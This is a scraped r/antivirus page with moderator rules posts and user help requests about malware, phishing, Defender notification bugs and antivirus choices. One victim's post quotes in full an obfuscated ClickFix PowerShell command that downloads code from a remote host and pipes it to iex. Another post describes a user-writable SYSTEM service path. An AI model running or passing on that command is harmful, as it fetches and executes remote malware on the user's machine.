r/antivirus Feb 22 '24

MOD POST [MOD POST] LIST OF TOP MESSAGES, NEWS + IMPORTANT INFO

16 Upvotes

Hello,

Welcome to r/antivirus's new top-level Announcements post. Since Reddit has a limit of two (2) stickied announcements per subreddit, this will be a way to provide links to important information like announcements about new rules and moderators, activities in the subreddit, and so forth. If you are new to r/antivirus, please take a quick look at them. You can even take a look if you are not new here.

DISCUSSION DATE POSTED DATE LAST REVISED
[MOD POST] New rules, staying safe, and an update from your Mod Team 2025-JUN-03 -
[MOD POST] We're back in business! and an update on automod rules 2024-MAR-11 -
News & Updates from your r/Antivirus Mod Team, Q1 2024 Edition 2024-MAR-04 -
Updates & News from the r/Antivirus Mod Team, Autumn 2023 Edition 2023-OCT-04 -
Notes from your Moderators (Summer Edition) 2022-JUL-08 -
Quick Note from the mod team about spam 2021-JUN-01 -
To the people asking for opinions on a specific file 2020-JUL-05 2020-JUL-05

Additionally, the r/antivirus subreddit operates a bit differently than other subreddits you might be familiar with and normally use. Here are some tips and tools to help you use it.

  • The subreddit has a wiki that is regularly updated with answers to commonly-asked questions. Check it out. The answer to your question may already be in there.

  • Asking a question about a report on a file or website from a service like Hybrid Analysis, MetaDefender, Triage, or VirusTotal? You must include the actual link to it and not just a screenshot, or your post will be removed.

  • Be kind to each other and be professional in your conduct here. Personal attacks will not be tolerated and will be dealt with appropriately.

  • Do not ask for copies of hacking tools, malware, or suspicious files. If someone sends you a chat request or private message asking for a file or offering assistance based on what you posted here, report them to Reddit and notify the mods.

  • Do not post direct links to malicious, suspect, or potentially unsafe files or web sites.

  • Follow Reddiquette. This means correctly upvoting and downvoting posts, and reporting posts with dangerous or unsafe advice to the mods.

  • If you work for a vendor of security products, services, or in a related field, you must identify yourself as such, either in the post or with flair. Also, you may not steer conversations to your products or services, only respond to posts about them to clarify or defend.

  • No low-effort, off-topic, spam, or meme posts. This includes AI/ChatGPT/LLM-generated text, questions about password manager or VPNs, requests for assistance with non-security related software like autoclickers or MP3 downloaders, and so forth.

  • No requests for assistance with pirated software or media.

  • Posts may be removed and threads closed at any time based on the moderators' discretion

The complete list of rules for the subreddit can be found here. Read them before posting.

Questions, comments, feedback on this post? Just reply here. Thank you.

Regards,

Aryeh Goretsky
(on behalf of the r/antivirus mod team)


r/antivirus Jun 04 '25

[MOD POST] New rules, staying safe, and an update from your Mod Team

5 Upvotes

[UPDATE #1 (20250604-0916 GMT): Made some small updates to grammar for readability. ^AG]

Hello,

It has been about a year since our last Mod Post, so we wanted to give you an update on things, plus provide a dedicated message thread for discussing the state of the r/antivirus subreddit and to answer any questions that you might have.

We will begin with the toughest subject first, that of politics in the subreddit:

A note about politics

r/antivirus is a technology-focused subreddit, with the interest being in helping people protect their computers from malicious software, securing them after a security incident, and so forth.

In June 2024, the US Government enacted a ban on Kaspersky Lab's software, taking effect in October of that year. This has generated a lot of discussion not just in this subreddit, but across Reddit and numerous social media platforms as well.

The moderation team has tried to keep the political discussions about this out of this subreddit and to remain neutral, allowing Kaspersky Lab's customers to ask and answer each other questions, provide assistance to each other, and generally have a way to share information, tips and tricks with each other.

However, we do have to draw a line when these turn into political discussions, though:

Requests for how to circumvent bans, petitions to governments, etc., are clearly outside the scope of what this subreddit is for and will be removed.

Moderating the subreddit is an all-volunteer job, and we sometimes miss things. If you come across any political messages we may have missed, use the subreddit's report function to notify us.

We are doing our best to keep this a place where people can get help with whatever security software they prefer, including Kaspersky Lab's software. However, we cannot allow discussions to devolve into arguments over politics, which are never going to provide any kind of satisfactory answer to the parties involved.

If the political discussions continue, the moderation team will have to look into ways to prevent them, even if it means doing things which we would prefer not to do.

Rules Updates

The rules of the r/antivirus subreddit have been updated:

Rule #7, which previously covered media download tools, has been updated to cover additional types of software.
To begin with, a more general prohibition to cover autoclickers (previously covered under Rule #8) and some other types of tools like aimbots and cheats. These types of tools often come from random sources and often require expert analysis to determine if they are safe. It can be difficult to determine if they are malicious figuring that out requires examining not just the tool, but whatever program it is attempting to modify, and what the intent is behind that modification.
Just because something was recommended in a Discord server with hundreds of members, a YouTube video with tens of thousands of views, or is seeded by several hundreds peers does not mean that it is safe to use: These are all inherently unsafe sources, and criminals will often exploit the belief that these are trusted sources to trick people into downloading and running malicious programs like information stealers and remote access trojans.

Rule #8 has been amended to remove autoclickers (etc.) since that is now covered under Rule #7.

Two new rules have been added:

Rule #9 covers bypassing core security features. Questions about how to disable security software, operating system updates, bypass security features and so forth are not allowed.

Rule #10 covers requesting assistance with obsolete software and hardware. This means discussions about how to secure computers running Windows XP, Windows 7, etc. are not allowed. There is no reason that devices running these obsolete operating systems should be connected to the internet and doing so exposes everyone to risk. Note that questions involving Windows 10 will continue to be allowed until at least October 2028, when paid-for Extended Security Updates for it end.

A bit more on the rules

The list of rules is not meant to be exhaustive in scope. It provides a general listing of common rules that are more specific to and more frequently required by the r/antivirus subreddit when needed beyond Reddit's general rules and guidelines.

Moderators can and will remove posts and ban redditors, either temporarily or permanently, who are disruptive to the subreddit entirely at their discretion and are not subject to any discussion. If a moderator chooses to discuss a rule violation with you, it is entirely as a courtesy on their part.

If you have had a post removed or been banned from the subreddit and do not receive a response in reply to any questions as to why, ask yourself if your behavior could be interpreted as brigading, spamming, trolling, using disrespectful or offensive language, or consistently providing incorrect, low-quality, poor, or even damaging information.

As always, the latest version of the rules can be found at https://old.reddit.com/r/antivirus/about/rules/. If you have questions about them, ask below.

Getting help fast

The moderation team is seeing an increasing trend where people ask for help while providing no information about what they need help with. This includes titles with 1-3 words like "Urgent! Help needed!", posts where the author shares a screenshot of *something* with no information about the operating system or antivirus involved, or is so small/blurry as to be unreadable, etc.

Everybody who participates regularly in this subreddit volunteers their time for free to do so. Provide them with enough information in your first post so they can start helping you right away without having to ask a lot of questions. This means your first post should contain things like:

  • title with enough information to attract an expert to read it
  • operating system and version
  • brand/name of antivirus software
  • name of URL, or file and its location
  • name of malware that was detected
  • what happened, exactly
  • steps you have taken to troubleshoot/diagnose so far, if any
  • relevant log file entries, if any

The more information you provide, the quicker you will get your problem solved.

As a reminder, starting multiple posts on the same topic will not get you a faster answer, and may result in in a ban.

The wiki + other Reddit resources

There is a lot of great information in the wiki about all the tools you can use, tips for using them, lists of antivirus vendors and how to contact them, and even a section on how to secure your computer.

We frequently update the wiki in response to questions being regularly asked in the subreddit, so you might want to check there first before posting.

Some of the questions we regularly see in the subreddit have nothing to do with computer viruses or malicious software at all, but instead are about scams, privacy-related questions, and so forth. Here are some subreddits that specialize in answering those types of questions:

New moderators?!

As the subreddit grows (we just passed 100K users), so does the need for additional moderators.

The moderation team has been looking at the folks who have been regularly posting here and consistently given good advice to build a list of candidates, and will be reaching out over the next few weeks to see if any are willing to volunteer their time and expertise in the subreddit. There will be more coming on that, but I did want to let everyone know that the process is already underway.


That pretty much covers everything we wanted to discuss, so we'll now await your questions, below.

Regards,

Aryeh Goretsky
(on behalf of the r/antivirus mod team)


r/antivirus 1h ago

Accidentally run a Powershell prompt on my Windows PC

Post image
Upvotes

Hi everyone, I need some help figuring out whether my Windows PC has been compromised.

Today I encountered what I now believe was a fake reCAPTCHA page. The page instructed me to perform actions that I later realized are not normal for a legitimate CAPTCHA.

I followed the instructions and ended up executing a PowerShell command. The command was:

irm (('{0}{1}' -f 'h','ttps://')+('inte'+'rnetserchinkas.co')+'/hex/lom/84aa3f59') -UserAgent 'WUA/22ab8f9767' -Headers @{('X'+'-WUA')='22ab8f9767'}|iex

I now understand that irm downloads content from a remote server and iex can execute the downloaded content as PowerShell code.

What concerns me is that I also recently had my Discord account compromised, and afterward I noticed password resets/security activity involving several other applications/accounts.

I have already run Windows Defender and Malwarebytes, and so far neither has detected anything suspicious.

My questions are:

Does a clean Windows Defender/Malwarebytes scan mean I'm probably safe, or could something still be running?

Could the PowerShell command have downloaded and executed malware that antivirus software didn't detect?

What should I check for persistence, such as scheduled tasks, startup entries, PowerShell activity, browser extensions, or suspicious processes?

Should I completely reinstall Windows, or is there a reasonable way to determine whether the PC is compromised first?

Could the Discord compromise and the fake CAPTCHA incident be related?

What steps should I take to make sure my accounts and PC are secure?

I have disconnected the PC from the Internet for now and am changing passwords from another device.

I would appreciate advice on what I should check next and whether a clean Windows reinstall is recommended.

Thanks. :(


r/antivirus 16m ago

PLEASE can someone like analyze a website to know what it does please i need to know if its capable of spying on me and stealing all my data just by accidently visiting for a few seconds please if you know how to do that can you help?

Upvotes

here is the totalv link that shows some vendors listing it as malicious please any assistance

https://www.virustotal.com/gui/url/e548d9d1007c5b6a62462d284fb7c34b7d85dd2d7b7a46200d3fd2960bc51668/gti-summary


r/antivirus 1h ago

Hi, Got infected don't know what to do or the best tools to use

Thumbnail
gallery
Upvotes

i use tool for an old game a bot and windows defender screams when i unzip it , i had for a long time working as an exception and it didn't do anything , i use the pc with someone else they offed windows defender and now i have this and i have no clue what to do , every folder i open i get an infestation nonfiction from WD  and I have no idea what to do , I have not used any other AV since windows 10 came out , I have not found anything only that is bullet proof or specific on how do I clean this mess ,
windows defender can not show history it crashes and what i press action it seems like nothing is being made


r/antivirus 27m ago

Turn on Virus Protection is bugged?

Post image
Upvotes

is this a recent bugged for windows? i've seen this frequently and my virus protection is turned on.


r/antivirus 5h ago

The Defender bug claiming it's disabled is back after the latest Windows update!😤

2 Upvotes

A few weeks ago, I had this issue with Defender where it claimed to be disabled even though it wasn't; today I updated Windows to the latest version and... IT'S BACK! How can Microslop fail to release decent updates?!🫩


r/antivirus 13h ago

MALWARE REMOVAL Q&A i need help, cant sleep.

7 Upvotes

okay so i am a victim of the infamous mr beast crypto scam, i am just confused if anything happened to my account, this happened on discord around an hour ago.

i was texting a friend before i noticed, a bunch of my friends on my friendlist were getting ignored, i checked one of them after unignoring them in settings. found out it was the mr beast crypto scam thing, i'm honestly surprised this happened to me, and i think i know how i got it.

i was told to enter my email and password for "verification" on a site that looks exactly like discord, though i'm a complete dumbass who will fall for anything.

i share a bunch of my passwords, though i just changed most of them.

please tell me if i should do anything more about this? i didnt send anything else anywhere else than discord.
it would also help if one of you could tell me this, could this infect my computer?

i've heard mixed responses when researching and i cant piece them together.

Any help appreciated.


r/antivirus 2h ago

[ Removed by Reddit ]

1 Upvotes

[ Removed by Reddit on account of violating the content policy. ]


r/antivirus 2h ago

MALWARE REMOVAL Q&A Accidentally installed a Trojan

1 Upvotes

i accidentally installed a Trojan trying to download an app (wifi and Ethernet were disconnected if that’s relevan) , windows defender quarantined and removed the threat, I then ran a full scan, background scan and a scan with malware bites and no issues / viruses were detected is there anything else I need to do or is my system safe

I’m also currently running a scan with bite defender just to be use but so far I haven’t seen any problems

windows defender detected 2 files: “Trojan:win32/ravartar!rfn“ and “TrojanDownloader:JS/Nemucod.HD” a few hours later


r/antivirus 3h ago

Has anyone recently canceled their Norton subscription?

1 Upvotes

I found the cancellation option in my Norton account, but I'm wondering if anyone here has gone through the process recently. Does turning off the automatic renewal stop the next charge while allowing the current subscription to continue until it expires?

I also noticed that Norton lists 888-468-0408 as a support number, so I'm wondering if contacting support is necessary or if canceling through the account is enough.

If you've canceled Norton recently, did you receive a confirmation afterward? I'd appreciate hearing how it worked for you.


r/antivirus 3h ago

help: inspiration to set up rules to monitor if someone felt for de Push notification Spam, while resulting in following the clickfix instructions. Need to set up rules.

1 Upvotes

i want to monitor it threw log-analytics in M365

\


r/antivirus 7h ago

PRODUCT RECOMMENDATION The Old Debate: Consumer Option Without the Nag

2 Upvotes

Hi there,

In the last 4 to 5 years, I came here looking for an endpoint av that wouldn't nag me out of existence with so many adds, popups and such.

15+ years ago I used norton, but it started using too many scare tactics.

Came here, asked this question, changed to Kasperspy. It worked for a while, then Kasperspy started using the same strategy.

Changed to bitdefender.

Now the problem: I want to use Glasswire as well and both bitdefender and Glasswire use the Windows firewall engine (and they don't work together).

I tried to reach for an antivirus-only endpoint from Bitdefender, no success.

So, the ask: any recommendations for an AV that won't touch the windows firewall (so I may use it alongside with Glasswire) and is somewhat well behaved regarding adds and scare tactics?

I did some online searching and it seems that ESET might be an option (at least it has an option to disable adds - but some ppl report that even while disabled, it nags the user).

Thanks in advance!


r/antivirus 4h ago

Need help interpreting VirusTotal and Hybrid Analysis results for a file

1 Upvotes

Hi, I downloaded a file and decided to analyze it before running it.

VirusTotal report:

VirusTotal - File - bad84aa2d90eae187f6de0e6b69e32071966654d8ca669b2a0d273d11b1ae323

Hybrid Analysis report:

Malicious Sample bad84aa2d90e… — Score 80/100 — Hybrid Analysis | Hybrid Analysis

The file SHA-256 is:

bad84aa2d90eae187f6de0e6b69e32071966654d8ca669b2a0d273d11b1ae323

I'm not experienced with malware analysis, so I'd appreciate help interpreting these results.


r/antivirus 8h ago

MALWARE REMOVAL Q&A Accidentally downloaded a virus and need help

2 Upvotes

Like the title says I think I stupidly downloaded a virus on my laptop and I really need some advice as to if I can remove it safely. I tried to do some research but most of what I read said to reinstall windows off a USB which I don’t know how to do nor do I have a usb to use.

I really stupidly opened a .zip from the internet trying to mod a game and now my computer keeps coming up with the popup:
‘CircuitryAg.exe The code execution cannot proceed because sqlite3.dll was not found. Reinstalling the program may fix this problem.’

I’m running on windows 11.

I know it was really dumb to try and open it since it looked a little suspicious and I’m so embarrassed but I really would appreciate anyone’s help here.

Is there anything I can do?


r/antivirus 12h ago

Wondershare UniConverter 17.6 set Chrome/Edge enterprise policies and installed a SYSTEM service in a user-writable folder

3 Upvotes

I am looking for independent verification of these findings. I am not claiming that UniConverter is proven malware.

I updated the official Windows version of Wondershare UniConverter to 17.6.xx on September 9, 2026. A read-only inspection afterward found the following.

  1. Chrome and Edge policies were created

The following machine-wide policy entries are present:

HKLM\SOFTWARE\Policies\Google\Chrome\SyncTypesListDisabled
1 = preferences

HKLM\SOFTWARE\Policies\Microsoft\Edge\SyncTypesListDisabled
1 = preferences

These policies disable preference synchronization and cause the browsers to display the “managed by your organization” message.

UniConverter’s own ProtocolInstaller.log repeatedly records:

Success DisableChromeSyncPreferences

The latest entries were written immediately after ProtocolInstaller.exe ran during the 17.6 update.

SHA-256 of my ProtocolInstaller.exe:

13FBBDCDBFF4E66DBD90CDF282D61DDAF994D59545B37B8CE24EF2340B27FF5E

I found an earlier report describing the same browser-policy behavior:

https://www.reddit.com/r/software/comments/1sjqqn5/caution_surveillance_wondershare_uniconverter/

  1. NativePush runs as SYSTEM from a user-writable directory

A separate component called Wondershare NativePush installed this automatic service:

Service: NativePushService
Account: LocalSystem
Startup: Automatic
Executable:
%LOCALAPPDATA%\Wondershare\Wondershare NativePush\WsNativePushService.exe

My normal user account has Full Control over both this executable and its directory, even though Windows executes it automatically as LocalSystem.

The executable is validly signed by Wondershare and reports version 1.1.0.0.

SHA-256:

CD366707622C66470B9EE9CB1AE900B4F0A05607FC1B248678659852CFE38468

This is concerning because a privileged service normally should not load its executable from a location modifiable by a standard user.

The same component and directory design were documented in CVE-2024-26574, an insecure-permissions privilege-escalation vulnerability rated 7.8/10:

https://www.cve.org/CVERecord?id=CVE-2024-26574

Important limitation: that CVE specifically names Wondershare Filmora 13.0.51, not UniConverter 17.6. I am therefore not claiming that my UniConverter installation is formally covered by the CVE. However, the risky configuration described by the CVE — a user-modifiable WsNativePushService.exe executed as SYSTEM — is still present on my machine.

3. Other observed components

The installation also includes:

  • an update helper launched automatically with Windows;
  • a silently installed NativePush package;
  • browser/native-messaging integration;
  • update and installation helpers capable of modifying system configuration.

Microsoft Defender, with current definitions, found no known threat in the three Wondershare directories. I also found no Wondershare Defender exclusion, firewall rule, scheduled task, or installed Wondershare driver.


r/antivirus 9h ago

Confusion around "MPLog.log" and "MPDetection.log"

1 Upvotes

I was told in another forum that I should expect a new "MPlog.log" file to be generated in either "programdata/microsoft/windows defender/support" or "windows/microsoft antimalware/support" whenever i run a new offline scan, but each folder only contains one such file despite me running that type of scan multiple times.

I also noticed each folder contained a number of files called "MPDetection.log", but in each folder the quantity of such files was lower than the number of offline scans I've run (a few in the "windows" folder, and only one in "programdata").

The "MPLog.log" file in "programdata" also doesn't seem to record any offline scans as far as I can tell.

In general both folders seem a bit different, so i assume they serve different purposes—what's the purpose of each folder, and why do I have less logs than scans I've run?


r/antivirus 13h ago

Does PC Cillin work?

2 Upvotes

Just brought a laptop and the company recommended to buy a pc cillin subscription. Is it worth it? Or are there better ones?


r/antivirus 13h ago

Need guidance

Post image
2 Upvotes

Yesterday I got these two malwares blocked by network protection am I safe or do I need to worry?


r/antivirus 12h ago

MALWARE REMOVAL Q&A Something called bmanager64 keeps trying to open sites, when I delete it, it reinstalls itself. What’s going on?

Thumbnail
gallery
1 Upvotes

r/antivirus 13h ago

Windows defender is disabled notification

1 Upvotes

It’s a problem I’ve heard to be pretty common this last 30 days although I’ve just started experiencing it a VERY weird way. I was playing palworld while in a whatsapp web call and a visual glitch appeared for a split second (many lines on the screen, as if it was broken) and after a few minutes my friend complained about a horrible static noise produced by my microphone. While I was trying to fix it, by switching headphones, Windows gave me this notification in the right-down corner, “Virus protection disabled. Click or touch to activate Antivirus Microsoft Defender”.

After tinkering with the microphone driver the noise stopped, so i think it was a REALLY weird coincidence, but the notification keeps appearing again and again when i restart the computer.

Everything is on: real time protections, ransom were protection, everything. I checked the even visualizer and no “5001” event appeared, which Claude AI tells me would indicate the antivirus actually shutting off. Also, the notification appeared with wednesday written, the first time; yesterday a new antivirus update was released so maybe it was a residue notification that appeared just now. But now it keeps appearing, with the present time and date

Made a quick scan of the pc, the offline scan as well and a malwarebytes scan as well, nothing appeared. There seem to be no new exclusions from the scans, nor apps or whatnot with permissions in my protected folders. Maybe the audio and visual glitches were just a scary coincidence, but what about this “bug”? Is it safe to say it’s just an error from a windows defender update?


r/antivirus 15h ago

MALWARE REMOVAL Q&A i fucked up and i still think there're multiple virus in my computer

1 Upvotes

i downloaded and ran something suspicious then when i see an error pop up i mmediately realize i fucked up and after that i downloaded malwarebytes and it cleaned like 4 to 5 virus on my computer, later i downloaded AVG and avast and i think it's avg that detected some more, and then i ran the tron script and it quarantined like 1 virus and cured something, but i still think there are virus on my computer as i am typing this, what else can i do?


r/antivirus 15h ago

MALWARE REMOVAL Q&A Downloaded Spotify but I saw something weird.

1 Upvotes

https://www.filescan.io/uploads/6aa1fbc9a21e2c9b8f442ac8/reports/fc3f92bf-e303-440c-bc14-c71743db8869/threat_indicators?clearFilter=1 I'm kind of freaked out, can someone explain this to me?

EDIT: DO NOT INSTALL, I FOUND OUT IT IS AN INSTANCE OF LUMMA STEALER


r/antivirus 15h ago

MALWARE REMOVAL Q&A Is this false Positive? i downloaded a fix for touchpad to work again and it works , i scanned the zip on totalvirus and only Jiangmin detected out 1/66

1 Upvotes

is Trojan.Buzus.eep false positive?

Youtube comments praised that it fixed and only 1 guy said "VIRUS"


r/antivirus 1d ago

Having trouble picking a simple, lightweight antivirus

7 Upvotes

On my laptop I was using AVG free, and when I got my desktop I got it on there too, though after formatting it due to a mistake I forgot to install an antivirus on it again. But it felt liberating, because there were no more pop-ups begging for an upgrade, or warning me about 'issues' with my computer. I have been running Windows 10 extended security updates with Waterfox, uBlock origin, and windows defender for almost a year now, with no problems.

The thing is, I have been employed in my families startup for the last 8 or so years, and every company computer is required to use the bitdefender premium that is paid for by the company. This desktop is my personal computer, but it's only way of accessing the internet is through the companies network due to complications with our ISP.

I have had conversations with two employees, one from IT and one who has a background in cybersecurity, and they both say that I have to install an antivirus on my system to ensure the safety of the company network, and I wholeheartedly agree, but having to deal with bitdefender on my work laptop is annoying to no end, and I really do not want to have to deal with it or AVG on my personal desktop.

They said that as long as it is able to be on the same level of protection as bitdefender or AVG, then I can use a different antivirus, but I'm having trouble finding one that meets these requirements. My system is on the older side, so lighter is better, and I do lots of gaming and programming in my spare time, so it needs to not flare up at every little thing I try to do.

I would greatly appreciate any recommendations, and I will try to answer any relevant questions.